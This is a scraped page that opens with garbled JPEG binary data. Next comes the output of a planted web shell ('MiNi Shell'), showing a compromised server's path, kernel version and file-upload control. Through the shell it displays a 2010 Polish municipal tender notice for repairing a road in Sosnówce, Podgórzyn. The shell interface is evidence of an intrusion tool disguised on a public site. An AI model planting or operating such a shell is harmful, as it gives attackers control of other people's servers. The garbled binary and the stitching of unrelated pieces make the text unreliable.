JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100708/200604-N-2010.html

<p class="kh_header"><b>Podgórzyn: Remont drogi dojazdowej do gruntów rolnych o nawierzchni asfaltowej w Sosnówce dz. nr 669/1</b><br>
<b>Numer ogłoszenia: 200604 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podgórzyn , ul. Żołnierska 14, 58-562 Podgórzyn, woj. dolnośląskie, tel. 075 7621093, faks 075 7621358.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podgorzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi dojazdowej do gruntów rolnych o nawierzchni asfaltowej w Sosnówce dz. nr 669/1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. STAN ISTNIEJĄCY 
Odcinek drogi gminnej dz. nr 669/1 przewidziany do remontu przebiega na terenie gminy Podgórzyn i powiatu jeleniogórskiego od skrzyżowania z drogą powiatową 2653 D w Sosnówce na wysokości kościoła w kierunku obszarów leśnych wzdłuż gruntów rolnych przylegających bezpośrednio do pasa drogowego. Stan nawierzchni wymaga zabiegów remontowych z uwagi na znaczne zniszczenie i koleinowanie nawierzchni. Po dokonaniu wzmocnienia osłabionych odcinków drogi pozostała część jezdni nadaje się do wykorzystania jako warstwa podbudowy pod nową nawierzchnię bitumiczną. 
Na długości drogi zaobserwować można ruch pojazdów rolniczych (oraz maszyn budowlanych), który z uwagi na znajdujące się wzdłuż pasa drogowego grunty rolne jest znaczny szczególnie w okresach prac rolniczych. System odwodnienia pasa drogowego uległ degradacji co doprowadziło do uszkodzeń korpusu drogi. Zniszczeniu lub znacznemu pogorszeniu parametrów technicznych uległy obiekty inżynierskie (przepusty) oraz rowy odwodnieniowe. Lokalnie zawyżone pobocza powodują utrudnienia w spływie wód opadowych i roztopowych z korpusu drogi. 
W przypadku nie podjęcia naprawy tego odcinka, droga ulegnie dalszemu zniszczeniu, co spowoduje że nakłady na jej odbudowę będą zdecydowanie większe niż zakres planowanego remontu. Aby droga nadawała się do normalnej eksploatacji należy niezwłocznie wykonać jej remont, polegający na odtworzeniu systemu odwodnienia oraz wzmocnieniu warstw konstrukcyjnych podbudowy drogi i ułożeniu nowej nawierzchni bitumicznej. 
2. PARAMETRY PROJEKTOWANEJ DROGI 
- długość odcinka drogi do remontu - 770,94 m 
- szerokość jezdni - 3,0 ÷ 5,4 m 
- powierzchnia jezdni - 2 798,0 m2 
- szerokość chodnika - 1,5 m 
- powierzchnia chodnika - 208,0 m2 
- spadki podłużne - do 3 % 
- spadki poprzeczne - do 2 % 
- szerokość poboczy - 0,40 ÷ 1,00 m 
- spadek poprzeczny poboczy - 5 % 
- pochylenie skarp nasypów i rowów - 1:1,5 
- rowy przydrożne - 351,0 m 
- ruch - KR2 
3. ROZWIĄZANIA PROJEKTOWE 
Remont odcinka drogi zaprojektowano tak, aby sytuacyjnie trasę drogi dopasować do istniejących szerokości pasa drogowego oraz wysokościowo do niwelety istniejącej drogi. 
3.1. Konstrukcja jezdni 
Na podstawie dokonanych uzgodnień oraz w oparciu o wyniki analizy i dokonanych pomiarów sytuacyjno-wysokościowych zaprojektowano następującą konstrukcję jezdni: 
- w km od 0+000,00 ÷ 0+227,47 pow. 45,80 m2: 
remont cząstkowy nawierzchni z frezowaniem 
- frezowanie nawierzchni w miejscach uszkodzeń; 
- oczyszczenie frezowanej nawierzchni bitumicznej; 
- skropienie asfaltem istniejącej nawierzchni bitumicznej w ilości 0,5 kg/m2; 
- wyrównanie ubytków w istniejącej nawierzchni mieszanką mineralno - bitumiczną asfaltową w ilości średnio 100 kg/m2; 
- w km od 0+000 ÷ 0+227,47 pow. 1068,00 m2: 
- oczyszczenie istniejącej nawierzchni bitumicznej; 
- skropienie asfaltem istniejącej nawierzchni bitumicznej w ilości 0,5 kg/m2; 
- wykonanie warstwy wiążąco profilującej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 5 cm; 
- wykonanie warstwy ścieralnej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
- w km od 0+227,47÷ 0+770,94 pow. 487,20 m2: 
wzmocnienie podbudowy tłuczniowej: 
- frezowanie nawierzchni w miejscach uszkodzeń (zgodnie z PZT i przedmiarem); 
- wyrównanie podbudowy tłuczniem o grubości warstwy 10 cm; 
- skropienie asfaltem podbudowy w ilości 0,5 kg/m2; 
- wyrównanie wzmocnionej nawierzchni mieszanką mineralno - bitumiczną asfaltową w ilości średnio 100 kg/m2; 
- w km od 0+227,47÷ 0+770,94 pow. 1730,00 m2: 
- oczyszczenie istniejącej nawierzchni bitumicznej; 
- skropienie asfaltem istniejącej nawierzchni bitumicznej w ilości 0,5 kg/m2; 
- wykonanie warstwy wiążącej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
- wykonanie warstwy ścieralnej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
3.2. Konstrukcja chodnika 
Z uwagi na bezpieczeństwo dzieci w rejonie szkoły zaprojektowano chodnik o szerokości 1,50 m i następującej konstrukcji: 
- w km od 0+000 ÷ 0+140 pow. 208 m2: 
- warstwa odsączająca gr. 10 cm; 
- stabilizacja gruntu cementem gr. 15 cm; (w miejscach obniżeń krawężników 16,5 m2). 
- podbudowa z kruszywa kamiennego gr 15 cm; 
- podsypka cementowo piaskowa 1:4 gr. 3 cm; 
- kostka betonowa POLBRUK gr. 8 cm; 
3.3. Konstrukcja zjazdów 
- w km 0+137,33 - 5,3 m2
- w km 0+140,07 - 22,0 m2
- w km 0+157,80 - 8,7 m2
- w km 0+323,37 - 13,9 m2
- w km 0+347,18 - 10,7 m2 
- warstwa odsączająca gr. 10 cm;
- dolna warstwa podbudowy tłuczniowej gr. 15 cm;
- górna warstwa podbudowy z klińca gr. 8 cm;
- skropienie asfaltem podbudowy tłuczniowej w ilości 0,5 kg/m2;
- wykonanie warstwy wiążącej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
- wykonanie warstwy ścieralnej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
3.4. Konstrukcja skrzyżowań 
- w km 0+562,46 pole pow. 60,00 m2: 
- warstwa odsączająca gr. 10 cm; 
- dolna warstwa podbudowy tłuczniowej gr. 15 cm; 
- górna warstwa podbudowy z klińca gr. 8 cm; 
- skropienie asfaltem podbudowy tłuczniowej w ilości 0,5 kg/m2;
- wykonanie warstwy wiążącej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
- wykonanie warstwy ścieralnej nawierzchni z mieszanki mineralno- bitumicznej asfaltowej o grubości 4 cm; 
3.5. Konstrukcja poboczy 
- w km od 0+103,50 ÷ 0+227,47 pow. 103,7 m2 / 8,3 m3: 
- Wyprofilowanie i wzmocnienie materiałem kamiennym poboczy 8,3 m3 
- w km 0+103,50 0+227,47 obustronnie, z wyłączeniem chodnika średnia grubość 8 cm i szerokość 0,4 m ze spadkiem 5 do 6 % od jezdni 
- Powierzchniowe utrwalanie poboczy asfaltem i grysem kamiennym o wym. 2-5 mm w ilości 8 dm3/m2 - 103,7 m2 
- w km 0+103,50 0+227,47 obustronnie, z wyłączeniem chodnika 
- w km od 0+227,47 ÷ 0+770,94 pow. 462,5 m2 / 37,0 m3 / 18,5 m3: 
- Wyprofilowanie i wzmocnienie materiałem kamiennym poboczy 37,0 m3 
- w km 0+227,47 0+770,94 obustronnie, średnia grubość 8 cm i szerokość 0,4 m ze spadkiem 5 do 6 % od jezdni 
- Zamknięcie poboczy destruktem asfaltowym z frezowania nawierzchni-18,5 m3 
- w km 0+227,47 0+770,94 obustronnie, 
3.6. Odwodnienie 
W celu prawidłowego odwodnienia nawierzchni jezdni i przyległego terenu zaprojektowano spadki poprzeczne i podłużne drogi, rowy i przepusty tak aby odprowadzić wody opadowe poza korpus drogi do rowu i dalej do rowów melioracyjnych. Szerokość dna rowu 40 cm, nachylenie skarp 1:1,5, głębokość rowu min 1,0 m. względem niwelety drogi. 
- Projektowane do wykonania lub odtworzenia rowy z wyprofilowaniem dna szer. 0,4 m i skarp 1:1,5 z dopasowaniem niwelety dna rowu do dna przepustów i odwozem nadmiaru gruntu na odl. do 10 km: 
- 0+237 do 0+342, L= 105 m
- 0+350 do 0+545, L= 195 m
- oraz wyloty do rowów melioracyjnych L=51,0 m 
Łącznie długość rowów L = 351,0m 
- Projektowane przepusty rurowe z rur z tworzywa PEHD wraz z ławą o średnicy 40 cm na zjazdach: 
- w km 0+323,37 L= 6,0 m 
- w km 0+347,18 L= 8,0 m 
- Projektowany przepust rurowy z rur z tworzywa PEHD wraz z ławą o średnicy 50 cm pod jezdnią: 
- w km 0+342,21 L= 6,0 m 
- Projektowane ścianki przepustów z kamienia - 2 szt. dla rur O 400mm i 2 szt dla rur O 500mm z umocnieniem wlotów i wylotów 
4. Urządzenia bezpieczeństwa ruchu 
- Bariery drogowe stalowe SP-09 L=12,0m 
- w km 0+582,80 do 0+594,80 - L= 12,0 m 
w tym zakończenie barier 2 szt. po 4,0 m L=8,0 m.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wskazanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie najmniej jednej roboty budowlanej o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty o wartości powyżej 300.000,00 zł, zawierającej w swym zakresie budowę, bądź remont: drogi, chodnika, placu, parkingu o nawierzchni mineralno-bitumicznej
oraz załączenie dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie osobą (osobami) uczestniczącymi w wykonywaniu zamówienia, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podgorzyn.signform.pl/podgorzyn/browse.php?catprz=527<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Podgórzyn
Ulica Żołnierska 14
58-562 Podgórzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 09:30, miejsce: Urząd Gminy Podgórzyn
Ulica Żołnierska 14
58-562 Podgórzyn
Pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com